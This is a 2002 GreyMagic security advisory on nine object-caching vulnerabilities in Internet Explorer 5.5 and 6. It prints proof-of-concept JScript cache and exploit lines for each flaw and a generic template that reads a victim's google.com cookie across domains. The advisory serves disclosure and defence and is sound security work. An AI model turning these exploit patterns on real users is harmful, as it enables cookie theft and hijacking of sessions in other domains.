GreyMagic Security Advisory GM#012-IE
By GreyMagic Software, Israel.22 Oct 2002.
Topic: Vulnerable cached objects in IE (9 advisories in 1).
Discovery date: 4 Oct 2002, 17 Oct 2002, 21 Oct 2002.
Affected applications:Microsoft Internet Explorer 5.5 and 6.0; prior versions are not vulnerable.
IE6 SP1 is vulnerable to the "external" and "clipboardData" vulnerabilities and immune to the rest.
Note that any other application that uses Internet Explorer's engine (WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.).
Introduction:When communicating between windows, security checks ensure that both pages are in the same security zone and on the same domain. These crucial security checks wrongly assume that certain methods and objects are only going to be called through their respective window. This assumption enables some cached methods and objects to provide interoperability between otherwise separated documents.
Many security issues arise from storing references to objects that are supposed to be inaccessible when the page unloads. PivX lately disclosed such an issue in the <object> element, which left a valid reference in its "object" property.
Discussion:Through exhaustive research, we discovered nine vulnerabilities in Internet Explorer involving object caching, most of them highly critical. We're grouping all of these vulnerabilities into this advisory in order to avoid a flood and repetitive statements.
Object caching takes place when the attacker opens a window to a page in his own site. The URL in the window is then changed to the victim page, but the cached references stay in place, providing direct access to the new document.
All nine vulnerabilities are of the same general class (object caching). However, each of them is a separate vulnerability, which uses a unique method for exploitation.
Each item in the list below consists of three parts, "Cache" shows how to cache the vulnerable object, "Exploit" shows how the vulnerability works in context and "Impact" details the implications of the vulnerability.
"Full access" means access to any page's Document Object Model in any domain and any zone. The implications include (but not limited to) reading cookies from any domain, forging content in any URL, reading local files and executing arbitrary programs.
- showModalDialogCache: var fVuln=oWin.showModalDialog;Exploit - IE 5.5: fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability.Impact: Full access in IE5.5, "My Computer" zone access in IE6.
- externalCache: var oVuln=oWin.external;Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");Impact: Full access.
- createRangeCache: var fVuln=oWin.document.selection.createRange;Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">");Impact: Full access.
- elementFromPointCache: var fVuln=oWin.document.elementFromPoint;Exploit: alert(fVuln(1,1).document.cookie);Impact: Full access.
- getElementByIdCache: var fVuln=oWin.document.getElementById;Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);Impact: Full access.
- getElementsByNameCache: var fVuln=oWin.document.getElementsByName;Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);Impact: Full access.
- getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName;Exploit: alert(fVuln("BODY")[0].document.cookie);Impact: Full access.
- execCommandCache: var fVuln=oWin.document.execCommand;Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text"));Impact: Read access to the loaded document.
- clipboardDataCache: var oVuln=oWin.clipboardData;Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");Impact: Read/write access to the clipboard, regardless of settings.
IE5.5 SP2 and IE6 are vulnerable to all of the above. IE6 SP1 is vulnerable to the "external" object caching and to the "clipboardData" object caching, it's immune to the rest.
Exploit:This generic exploit demonstrates how an attacker may read the client's "google.com" cookie using one of the cached objects above.
<script language="jscript">
var oWin=open("blank.html","victim","width=100,height=100");
[Cache line here]
oWin.location.href="http://google.com";
setTimeout(
function () {
[Exploit line(s) here]
},
3000
);
</script>
Until a patch becomes available disable Active Scripting.
Tested on:
IE5.5 Win98.
IE5.5 NT4.
IE6 Win98.
IE6 Win2000.
IE6 WinXP.
Try out the online demonstration and see if you're vulnerable.
Disclaimer:The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.
Vulnerability details are provided strictly for educational and defensive purposes.
GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
Stay informed:Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.
Press here to subscribe.
Your privacy is important to us, read our Privacy Statement.